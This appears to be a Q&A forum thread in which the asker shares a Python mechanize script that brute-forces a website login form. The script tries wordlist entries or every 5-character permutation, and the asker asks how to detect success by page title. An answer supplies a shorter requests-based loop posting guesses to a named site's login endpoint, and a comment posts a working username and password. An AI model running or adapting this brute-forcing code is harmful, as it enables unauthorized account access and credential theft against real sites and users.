# Python - mechanize/requests get Title

Tags: python, python-requests, mechanize

So, I have this brute-forcing script, that basically brute-forces web forms. Say my example site's web-form redirects to the same URL when logged in successfully or not. For example, to login I'd have to go to this site: https://example.com/account/, when I type a wrong username/password, it doesn't change the URL of the page. Everything stays the same. And if I DO type the correct username & password, it changes the page title, but the URL still stays the same.

I want to change: `response.geturl() --> response.gettitle()` But I'm not sure what's the correct attribute for this.

My Code:

```
#!/usr/bin/python
import mechanize
import itertools
import sys
import os

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
br.addheaders = [('User-Agent', ua), ('Accept', '*/*')]

if len(sys.argv) > 1:
    if os.path.exists(sys.argv[1]):
        combos = [line.strip() for line in open(sys.argv[1])]
    else:
        print "[-] File not found"
        sys.exit()
else:
    combos = itertools.permutations("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",5)

r = br.open("https://example.com/account/")

for x in combos:
    br.select_form(nr = 0)
    br.form['login'] = "my_username"
    br.form['pass'] = ''.join(x)
    print "\033[1;33;48mChecking:"+"\033[1;34;48m",br.form['pass']
    response = br.submit()
    if response.geturl()=="https://example.com/account/":
    #if response.gettitle()==...
        print ""
        print "\033[1;32;48mPassword found:"+"\033[1;36;48m",''.join(x)
        break
```

Comment: `response.title()` ?

Comment: Doesn't work: AttributeError: closeable_response instance has no attribute 'title'

Comment: Have a look at http://stackoverflow.com/questions/11531958/verifying-br-submit-using-pythons-mechanize-module

Comment: Why are you trying to guess the password?

Comment: @Arpan I tried: print br.title() and it printed the title. But how can I print the title after: response = br.submit() ? For URL, it was response.geturl(), but for the title it doesn't work.

Comment: @PadraicCunningham asking the right questions.

Comment: @PadraicCunningham Because I'm trying to get this brute-forcing script to work for my site.

Comment: @CotoTheArcher, you tried  `br.title()`?

Comment: @PadraicCunningham As I said to Arpan;I tried: print br.title() and it printed the title. But how can I print the title after: response = br.submit() ? For URL, it was response.geturl(), but for the title it doesn't work.

Comment: You will need to parse the html returned, use bs4 and indeed this would probably be a lot easier using requests

Comment: @PadraicCunningham How do I do that?

Comment: `Beautifulsoup(r.get_data()).title`

Comment: @PadraicCunningham Again, this is like br.title() - it prints the title of the page, BEFORE br.submit().

Comment: Can you share the url so at least we know what the server is doing?

Comment: @PadraicCunningham https://bagar.io/en/account/ - An example, working username/password: user: Coto123 pass: MCoto_16 . When I login normally, it changes the title from "Authorization" to "Bagar.io Your personal area".

Comment: @CotoTheArcher, are you open to using requests?

Comment: @PadraicCunningham Yeah.

Answer (score 1):

This is very simple with requests:

```
import requests
data ={"login":"yourlogin",
"pass": "yourpass"}


r = requests.post("https://bagar.io/engine/modules/login.php", data=data)
print("success" in r.json())
```

A successful login returns `{u'success': u'allow'}` and an unsuccessful return `{u'error':lot of unicode...}`.

So just keep passing login data:

```
    for x in combos:
        data = {"login":"my_username",
                "pass":"".join(x)}
        r = requests.post("https://bagar.io/engine/modules/login.php", data=data)
        print("success" in r.json())
```

Comment: Can you edit your post and make the script like the one I posted above? Meaning it can technically brute-force the web-form if it wanted.

Comment: Do I really need: br.select_form(nr = 0) ?

Comment: Nope, left over from copy paste

Comment: @CotoTheArcher, you realise your own code does not successfully login?

Comment: How come does it fail to login?

Comment: How come does it fail to login? @Padraic Cunningham